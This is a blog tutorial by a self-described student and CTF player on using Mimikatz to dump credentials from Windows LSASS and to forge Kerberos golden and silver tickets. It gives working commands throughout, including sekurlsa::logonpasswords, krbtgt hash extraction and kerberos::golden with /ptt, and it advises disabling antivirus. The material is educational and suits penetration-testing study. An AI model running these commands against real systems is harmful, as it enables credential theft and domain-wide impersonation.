Mimikatz

Harshdushyant
5 min read · Feb 5, 2021

In this post we will look at how to use Mimikatz for post-exploitation: dumping credentials from LSASS and forging Kerberos tickets.

Photo by Kote Puerto on Unsplash

In French, mimikatz means roughly "cute cats", but this tool is anything but cute. It is a post-exploitation tool used by attackers, red and blue teamers and penetration testers alike to pull logon IDs, password hashes, clear-text passwords, Kerberos tickets and other authentication material out of a compromised Windows host, and then use that material to elevate privileges and move laterally across the breached network.

The tool was written by the French security researcher Benjamin Delpy (gentilkiwi), who in 2011 demonstrated to Microsoft that Windows kept users' logon passwords recoverable in memory. Mimikatz works by reading (and, for some modules, injecting into) the memory of the live LSASS process, which is how it can print a user's Windows logon password as plain text.

Now the first thing to understand is the Local Security Authority (LSA).

The LSA is the protected subsystem that authenticates users and logs them on to the local computer. It also maintains information about all aspects of local security on the machine (collectively known as the local security policy) and provides services for translating between names and security identifiers (SIDs). The process that implements it, the Local Security Authority Subsystem Service (lsass.exe), keeps track of the security policies and the accounts that are in effect on the system.

Because LSASS is the process doing the work, it is also the process that holds the secrets: it caches credentials in memory on behalf of every user with an active Windows session.

Those cached credentials are what let a user reach network resources such as file shares, Exchange mailboxes and SharePoint sites without re-entering a password for each remote service (single sign-on), and they are exactly what Mimikatz reads out.

LSASS can cache credentials in several forms, including:

  • NT hash
  • LAN Manager hash (only on legacy configurations)
  • Kerberos tickets (ticket-granting tickets (TGTs) and service tickets) and keys
  • Reversibly encrypted plain text (the WDigest and TsPkg packages)

LSASS does not perform the credential check itself. It hands the supplied credentials to an authentication package and creates the access token only after that package reports that they are valid.

The authentication package (a DLL loaded into LSASS) checks whether the supplied password matches what is stored for that user name: MSV1_0 checks against the local SAM, or via NTLM for domain accounts, and the Kerberos package validates against the domain controller. If the credentials are consistent, the package returns the user's account information (SID, group memberships) to LSASS.

LSASS builds the token from that information. The packages you will typically see are msv (MSV1_0, NTLM), tspkg, wdigest, livessp, kerberos and ssp, plus the credman credential manager; each caches credentials in its own format for the logon type it serves, for example tspkg for RDP and wdigest for HTTP Digest authentication. This is why one logon session can yield both an NT hash (from msv) and, on older or misconfigured systems, a clear-text password (from wdigest).

Install Mimikatz

Precompiled Windows binaries are published on the releases page of the gentilkiwi/mimikatz GitHub project; download mimikatz_trunk.zip and use the x64 or Win32 build that matches the target.

Every mainstream antivirus, Windows Defender included, flags the binary on sight, so to run it on your own machine you will have to disable or exclude it first. Mimikatz is not malware, but treat it as if it were: run it in an isolated lab environment, where you can experiment without tripping alerts or fighting a flood of errors.

Commands

Commands are entered as the module name, two colons and the command name (module::command), followed by any /option:value arguments. Mimikatz can also be driven non-interactively by passing several commands on the command line, each as a separate argument, ending with exit; any command that contains a space, such as log with a file name, must be enclosed in double quotes.

1. Get the debug privilege.

mimikatz # privilege::debug

Extracting clear-text passwords starts with the debug command from the privilege module. It enables SeDebugPrivilege for the Mimikatz process, which is what allows it to open a handle to LSASS (a protected SYSTEM process) and read its memory. A successful call prints Privilege '20' OK; if it errors instead, Mimikatz was not started from an elevated (administrator) prompt.

2. Record the session to a log file.

mimikatz # log

The default log file is mimikatz.log in the current directory. To use a custom name instead:

mimikatz # log customname.log

Once logging is on, everything printed for the rest of the session is written to that file for later analysis (or exfiltration), which is far more reliable than scrolling back through a console full of hashes. Keep in mind that the file now contains credentials and must be handled, and cleaned up, accordingly.

3. Dump the credentials.

mimikatz # sekurlsa::logonpasswords

The logonpasswords command walks LSASS memory on the target host and prints, for every currently and recently logged-on session, the user name, domain and SID together with whatever each authentication package has cached: the NT hash (and SHA1) from msv, Kerberos keys, and clear-text passwords from wdigest where they are available. Two caveats: on Windows 8.1 / Server 2012 R2 and later, WDigest no longer caches clear-text passwords by default, so the wdigest Password field reads (null) unless the UseLogonCredential registry value has been set to 1; and when LSA Protection (RunAsPPL) is enabled, sekurlsa cannot open LSASS at all until the protection is removed with the mimidrv kernel driver. The command needs privilege::debug (or a SYSTEM shell) and runs locally on the compromised machine.

Golden and Silver Ticket Attacks

Mimikatz is most often used to dump credentials, but here we will use it to forge Kerberos tickets: Golden and Silver Tickets.

The key difference between the two is what the ticket is encrypted with, and therefore how far it reaches. A silver ticket is a forged service ticket, encrypted with the key of a single service account, so it is valid only for that service on the hosts where that account runs (and it never touches the domain controller). A golden ticket is a forged ticket-granting ticket (TGT), encrypted with the krbtgt account's key, so it can be used to request service tickets for any Kerberos service in the domain.

Understanding krbtgt

To understand how these attacks work you need to know the difference between krbtgt and a TGT. krbtgt is the account whose key the Key Distribution Center (KDC) uses to encrypt and sign every ticket-granting ticket it issues; the KDC runs on each domain controller and hands out all tickets to clients. A TGT is the ticket a client receives after authenticating: it proves the client's identity to the KDC and is exchanged for service tickets, one per service (for example a ticket for the SQLService account's SPN). Whoever holds the krbtgt key can therefore create TGTs for any user with any group membership, and those TGTs are accepted because the only way to check them is with that same key. Whoever holds only a service account's key can forge tickets for that service alone.

Dump the krbtgt hash:

mimikatz # lsadump::lsa /inject /name:krbtgt

This dumps the NT hash of the krbtgt account, the one value needed to create a golden ticket. lsadump::lsa /inject reads it out of LSASS on the machine where it runs, so it has to be executed on a domain controller (after privilege::debug). From any other domain-joined host whose account has replication rights, lsadump::dcsync /user:krbtgt fetches the same hash over the network using the directory replication protocol instead.

Dump the SQLService hash:

mimikatz # lsadump::lsa /inject /name:SQLService

This dumps the NT hash of the SQLService account. Because every service ticket for a service is encrypted with the service account's key, that NT hash is enough to forge a silver ticket for any SPN registered to the account. In Mimikatz this is done with the same kerberos::golden module, passing /service and /target to name the SPN and /rc4 with the service account's hash in place of /krbtgt.

Creating a Golden Ticket

Creating the ticket is the easy part: take the hash from the krbtgt dump and the domain SID, and assemble the command.

mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500

/user:(account name to impersonate; it does not even have to exist in the domain)
/id:(RID to place in the ticket; 500 is the built-in Administrator)
/domain:(fully qualified domain name)
/sid:(the domain SID, i.e. the S-1-5-21-... prefix every account in the domain shares, with no trailing RID; take krbtgt's SID from the dump and drop its last component, 502)
/krbtgt:(NT hash of the krbtgt account, from the lsadump output)

Using the Golden Ticket

mimikatz # misc::cmd

This opens a new command prompt that inherits the current logon session, and with it any Kerberos tickets loaded into that session. One caveat: as written above, kerberos::golden only writes the forged ticket to a file (ticket.kirbi in the working directory). Either add /ptt to that command so the ticket is injected into the session directly, or load the file with kerberos::ptt ticket.kirbi before running misc::cmd. In the new prompt, klist shows the forged TGT, and anything that authenticates with Kerberos (listing the C$ share of the domain controller, PsExec, and so on) runs as the forged Administrator: we are now the controller.

I am ending this post here for now, but Mimikatz has tons of other uses as well. I will expand this post from time to time as I understand them and have executed them on my own; until then, here's a meme for you.

Do some research as well; there are tons of great articles in the wild, you just have to read them and take notes.

Author:- Harsh Dushyant Singh


I am a student, Bug Bounty Hunter, CTF player and a geek for sure. Who is currently sharpening the axe.